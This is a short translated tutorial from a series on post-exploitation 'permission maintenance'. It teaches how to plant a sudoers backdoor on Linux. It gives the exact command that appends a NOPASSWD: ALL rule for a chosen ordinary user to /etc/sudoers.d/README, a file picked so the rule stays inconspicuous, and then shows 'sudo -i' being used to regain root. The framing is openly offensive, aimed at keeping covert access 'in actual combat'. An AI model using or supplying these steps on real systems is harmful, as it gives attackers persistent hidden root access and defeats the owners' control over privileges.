series of articles
Operating system authority maintenance (1) Windows system - paste key backdoor
operating system authority maintenance (2) Windows system - clone account maintenance backdoor
operating system authority maintenance (3) Windows system - startup item maintenance backdoor
operating system authority maintenance (4) ) Windows system-scheduled task maintenance backdoor
operating system permissions maintenance (5) Windows system-system services maintenance backdoor
operating system permissions maintenance (6) Linux system-scheduled tasks backdoor
operating system permissions maintenance (7) Linux system-SUID Backdoor
OS Permission Maintenance (8) Linux System-SSHKey Backdoor
Operating System Permission Maintenance (9) Linux System-Add User Backdoor
Operating System Permission Maintenance (10) Linux System-SSH Soft Connection Backdoor
Operating System Permission Maintenance (11) ) Linux system - SSH Wrapper backdoor
sudoers exploit the backdoor
The backdoor is used to regain the root identity when the root user identity is lost
The sudo command can enable users to temporarily obtain administrator privileges to execute commands. The control of sudo is based on the sudoers file, which limits the user name, user group, and what to execute.
The general format of /etc/sudoers is: user host runas command user: one or several users, which can be replaced by a % in /etc/group, and the name of the group object must start with the percent sign %.
host: one or several host names; runas: as which user to run, the common options are root and ALL command: one or several root-level commands that you want the user or group to run.
For example: hans ALL=(root) useradd, userdel authorizes the hans user to run useradd and userdel commands as root on all computers.
In this way, we use one sentence to add the built-in/or our own added normal authority users to the sudoer list, so that we can secretly execute administrator authority commands. Use the original low-privilege user as a backdoor.
First we have to edit the /etc/sudoers.d/README file
vim /etc/sudoers.d/README
Execute the following command to add content to the file
sudo su -c "echo 'xiaowang ALL = NOPASSWD: ALL' >> /etc/sudoers.d/README"
这里的 xiaowang是你丢失root权限后用来取回root权限的普通用户
cat /etc/sudoers.d/README
At this point we switch to ordinary user xiaowang to imitate that we lost our root identity in actual combat
Then we execute
sudo -i
regain root status